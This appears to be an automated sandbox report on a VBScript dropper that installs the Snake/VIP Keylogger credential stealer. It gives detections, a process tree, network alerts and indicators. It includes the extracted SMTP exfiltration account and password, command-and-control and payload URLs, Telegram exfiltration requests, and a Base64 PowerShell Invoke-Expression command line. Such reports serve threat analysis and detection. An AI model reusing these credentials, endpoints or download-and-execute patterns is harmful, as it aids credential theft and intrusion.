
Windows Analysis Report
jjmax il.vbs

Overview

General Information

Sample name: jjmax il.vbs
Analysis ID: 1617738
MD5: f545e8be6220242acf3b735f153d0650
SHA1: bf5df9d7432b38159c1ca101e1df8c292cedcac0
SHA256: 1817a7661c198619d6cedcaf58cdaa63f3195551edb1597f4c3c3497799d42d7
Tags: vbs, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 7424 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}
Yara matches in memory dumps (Source; Rule; Description; Author; Strings):
Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x2e112:$a1: get_encryptedPassword
  • 0x2e43b:$a2: get_encryptedUsername
  • 0x2df22:$a3: get_timePasswordChanged
  • 0x2e02b:$a4: get_passwordField
  • 0x2e128:$a5: set_encryptedPassword
  • 0x2f810:$a7: get_logins
  • 0x2f773:$a10: KeyLoggerEventArgs
  • 0x2f3d8:$a11: KeyLoggerEventArgsEventHandler
Source: 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security

Yara matches in unpacked PE files (Source; Rule; Description; Author; Strings):
Source: 2.2.powershell.exe.1f5dc50d150.7.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 2.2.powershell.exe.1f5dc50d150.7.unpack; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 2.2.powershell.exe.1f5dc50d150.7.unpack; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 2.2.powershell.exe.1f5dc50d150.7.unpack; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x2c512:$a1: get_encryptedPassword
  • 0x2c83b:$a2: get_encryptedUsername
  • 0x2c322:$a3: get_timePasswordChanged
  • 0x2c42b:$a4: get_passwordField
  • 0x2c528:$a5: set_encryptedPassword
  • 0x2dc10:$a7: get_logins
  • 0x2db73:$a10: KeyLoggerEventArgs
  • 0x2d7d8:$a11: KeyLoggerEventArgsEventHandler
Source: 2.2.powershell.exe.1f5dc50d150.7.unpack; Rule: MAL_Envrial_Jan18_1; Description: Detects Encrial credential stealer malware; Author: Florian Roth; Strings:
  • 0x3a28a:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x3992d:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39b8a:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3a569:$a5: \Kometa\User Data\Default\Login Data

Yara matches in AMSI buffers (Source; Rule; Description; Author):
Source: amsi64_6140.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

                  Networking

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 111.90.142.170, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49844

                  System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')) | Invoke-Expression", CommandLine: "C
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')) | Invoke-Expression", CommandLine: "C
Source: Network Connection; Author: Kiran kumar s, oscd.community; Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7424, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49707
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", ProcessId: 6416, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\jjmax il.vbs", ProcessId: 6416, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')) | Invoke-Expression", CommandLine: "C
Suricata IDS alerts (Timestamp; SID; Severity; Classtype; Source IP:Port -> Destination IP:Port; Protocol):
Timestamp: 2025-02-18T08:22:29.543691+0100; SID: 2057635; Severity: 1; Classtype: A Network Trojan was detected; 23.186.113.60:443 -> 192.168.2.7:49700; TCP
Timestamp: 2025-02-18T08:22:27.677768+0100; SID: 2049038; Severity: 1; Classtype: A Network Trojan was detected; 193.30.119.105:443 -> 192.168.2.7:49699; TCP
Timestamp: 2025-02-18T08:22:15.545041+0100; SID: 2060048; Severity: 1; Classtype: Malware Command and Control Activity Detected; 192.168.2.7:49844 -> 111.90.142.170:587; TCP
Timestamp: 2025-02-18T08:22:34.646334+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; 192.168.2.7:49719 -> 104.21.64.1:443; TCP
Timestamp: 2025-02-18T08:22:37.734493+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; 192.168.2.7:49743 -> 104.21.64.1:443; TCP
Timestamp: 2025-02-18T08:22:40.655855+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; 192.168.2.7:49766 -> 104.21.64.1:443; TCP
Timestamp: 2025-02-18T08:22:43.871843+0100; SID: 2803305; Severity: 3; Classtype: Unknown Traffic; 192.168.2.7:49785 -> 104.21.64.1:443; TCP
Timestamp: 2025-02-18T08:22:32.380313+0100; SID: 2803274; Severity: 2; Classtype: Potentially Bad Traffic; 192.168.2.7:49707 -> 132.226.8.169:80; TCP
Timestamp: 2025-02-18T08:22:33.638717+0100; SID: 2803274; Severity: 2; Classtype: Potentially Bad Traffic; 192.168.2.7:49707 -> 132.226.8.169:80; TCP
Timestamp: 2025-02-18T08:22:35.498113+0100; SID: 2803274; Severity: 2; Classtype: Potentially Bad Traffic; 192.168.2.7:49725 -> 132.226.8.169:80; TCP
Timestamp: 2025-02-18T08:22:29.543691+0100; SID: 2858295; Severity: 1; Classtype: A Network Trojan was detected; 23.186.113.60:443 -> 192.168.2.7:49700; TCP
Timestamp: 2025-02-18T08:22:29.176255+0100; SID: 2841075; Severity: 1; Classtype: Malware Command and Control Activity Detected; 192.168.2.7:49700 -> 23.186.113.60:443; TCP
Timestamp: 2025-02-18T08:22:46.839531+0100; SID: 1810007; Severity: 1; Classtype: Potentially Bad Traffic; 192.168.2.7:49803 -> 149.154.167.220:443; TCP


                  AV Detection

Source: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d; Avira URL Cloud: Label: malware
Source: http://turkey.ipchina163.com; Avira URL Cloud: Label: malware
Source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}
Source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "jjmaxcolrlone@interelub.com", "Password": "!YxP!%1gFh=G", "Host": "turkey.ipchina163.com", "Port": "587", "Version": "4.4"}
Source: jjmax il.vbs; Virustotal: Detection: 18%
Source: jjmax il.vbs; ReversingLabs: Detection: 13%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack; String decryptor: jjmaxcolrlone@interelub.com
Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack; String decryptor: !YxP!%1gFh=G
Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack; String decryptor: turkey.ipchina163.com
Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack; String decryptor: 587
Source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack; String decryptor:

                  Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: unknown; HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49713 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49803 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb; source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss; source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator; source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed; source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb; source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4x nop then jmp 02FEF45Dh; 11_2_02FEF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4x nop then jmp 02FEF45Dh; 11_2_02FEF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4x nop then jmp 02FEFC19h; 11_2_02FEF961

                  Networking

                  Source: Network traffic | Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.7:49844 -> 111.90.142.170:587
                  Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49803 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.105:443 -> 192.168.2.7:49699
                  Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 23.186.113.60:443 -> 192.168.2.7:49700
                  Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.186.113.60:443 -> 192.168.2.7:49700
                  Source: unknown | DNS query: name: paste.ee
                  Source: unknown | DNS query: name: api.telegram.org
                  Source: global traffic | TCP traffic: 192.168.2.7:49844 -> 111.90.142.170:587
                  Source: global traffic | HTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1 | Host: 3005.filemail.com | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /d/QXyRXYmm/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:088753%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:06:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20088753%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 132.226.8.169
                  Source: Joe Sandbox View | IP Address: 23.186.113.60
                  Source: Joe Sandbox View | ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown | DNS query: name: checkip.dyndns.org
                  Source: unknown | DNS query: name: reallyfreegeoip.org
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49725 -> 132.226.8.169:80
                  Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
                  Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.7:49700 -> 23.186.113.60:443
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 104.21.64.1:443
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49785 -> 104.21.64.1:443
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49766 -> 104.21.64.1:443
                  Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 104.21.64.1:443
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49713 version: TLS 1.0
                  Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknown | TCP traffic detected without corresponding DNS query: 104.98.116.138
                  Source: unknown | TCP traffic detected without corresponding DNS query: 20.50.201.200
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: 3005.filemail.com
                  Source: global traffic | DNS traffic detected: DNS query: time.windows.com
                  Source: global traffic | DNS traffic detected: DNS query: paste.ee
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic | DNS traffic detected: DNS query: turkey.ipchina163.com
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 18 Feb 2025 07:22:46 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAD41000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000033D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://turkey.ipchina163.com
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3005.filemail.com
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAF64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS
                  Source: MSBuild.exe, 0000000B.00000002.2563409319.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2563409319.00000000044F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CAD41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                  Source: powershell.exe, 00000002.00000002.1385612186.000001F5CCA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1385612186.000001F5CB144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                  Source: powershell.exe, 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                  Source: MSBuild.exe, 0000000B.00000002.2554364228.00000000032C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
